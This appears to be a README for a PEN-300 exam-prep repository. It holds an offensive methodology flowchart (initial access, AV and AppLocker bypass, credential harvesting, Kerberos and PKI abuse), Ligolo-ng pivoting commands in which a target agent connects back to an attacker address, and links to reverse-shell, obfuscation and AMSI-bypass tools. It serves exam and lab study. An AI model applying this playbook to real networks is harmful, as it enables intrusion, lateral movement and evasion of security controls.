BreakingtheChain

A high level methodology I utilised when tackling the PEN-300 exam and some enumeration and post exploitation scripts I developed during the PEN-300 course and challenge labs.

Methodology

flowchart TD

A[Reconnaissance] --> B[Initial Access]
B --> C[Privilege Escalation]
C --> D[Post Exploitation]
D --> E[Lateral Movement]
E --> C
E --> F[Forest Compromise]
F --> G[Secret Compromise]

%% Recursive machine compromise logic
D -->|Machine compromise enables adjacent initial access| B
E -->|Newly reachable system becomes new initial access| B

%% Recon
A1[DMZ Mapping - nmap TCP UDP] --> A
A2[Web Enumeration - ffuf vhosts] --> A
A3[SMB and FTP Enumeration] --> A
A4[Identity Mapping - Kerberos NTLM SMB Signing] --> A
A5[Credential Flow Mapping - Web to DB App to Service] --> A
A6[Management Planes - Jump CI CD PKI] --> A

%% Initial Access
B1[Insecure File Upload] --> B
B2[SQLi and Logic Flaws] --> B
B3[Authentication Bypass] --> B
B4[Phishing] --> B
B5[AV Evasion and AppLocker Bypass] --> B

%% Priv Esc
C1[Windows PrivEsc - Tokens Services UAC] --> C
C2[Linux PrivEsc - GTFOBins sudo systemd] --> C

%% Post Exploitation
D1[Credential Harvesting - History Keys DPAPI] --> D
D2[Secretsdump ccaches Certificates] --> D

%% Lateral Movement
E1[Hash Spraying Justifiable Targets] --> E
E2[Kerberoasting and ASREPRoasting] --> E
E3[DACL Abuse] --> E
E4[Delegation Abuse] --> E
E5[BloodHound Analysis] --> E

%% Forest
F1[Trust Enumeration] --> F
F2[Golden Ticket Extra SIDs] --> F
F3[Foreign Group Abuse] --> F

%% Secrets
G1[Vault Access] --> G
G2[Jump Host Pivot] --> G
G3[PKI Abuse ESC1 to ESC8] --> G

Loading

Enumeration

Enum-Architecture

Enum-ApplockerOn

Context-Enumeration

ApplockerandCLMBypass

InstallUtil

Post-Exploitation

Bash Posty

PowerShell Safe Posty

PowerShell Posty

Ligolo

https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740

Basic set up flow

Start the Ligolo proxy server on Kali start ligolo proxy

sudo ./linux-proxy-amd64 -selfcert -laddr 0.0.0.0:443

Start the Ligolo agent on the target

.\agent.exe -connect 192.168.45.202:443 -ignore-cert -retry

Add new Ligolo interface accessible by the user Kaiber on Kali.

sudo ip tuntap add mode tun ligolo

Set interface to up

sudo ip link set ligolo up

Add routes to the routing table

sudo ip route add 172.16.141.0/24 dev ligolo

To clean up routing table:

sudo ip route del 192.168.212.0/24 dev tun0

Port forwarding with remote Ligolo agent

IN Ligolo proxy server console:

Forward port 8888 of all agents 0.0.0.0 means we don't care which IP address to 127.0.0.1 our local address port 80 this means that if a internal machine accesses port 8888 to pull files from our python server it will be forwarded to our kali box.

listener_add --addr 0.0.0.0:4455 --to 127.0.0.1:445 --tcp

Double pivot:

listener_add --addr 0.0.0.0:44443 --to 0.0.0.0:443

Tunnel through second interface:

start --tun ligolo_two

To Access local ports of agent connected to your proxy server for ligolo:

sudo ip route add 240.0.0.1/32 dev ligolo

Then

nmap 240.0.0.1 -sV

Resources:

• PayloadsAllTheThings - If you're meant to exploit a web app, you'll find a methodology/payload here.
• OSEPlayground - My go to resource for ideas.
• TMUX Cheatsheet - Save time by utilising the OG, lightweight terminal multiplexer.
• Revshells.com - Quick Reverse Shell Generation.
• PowerShell Obfuscation Bible - Some of the best guidance on PowerShell Obfuscation I've found.
• PowerShell Obfuscator - Simple web application for obfuscating PowerShell to bypass Signature based detections.
• Obfuscated AMSI Bypass Generation - Dynamic payload generation to bypass AMSI.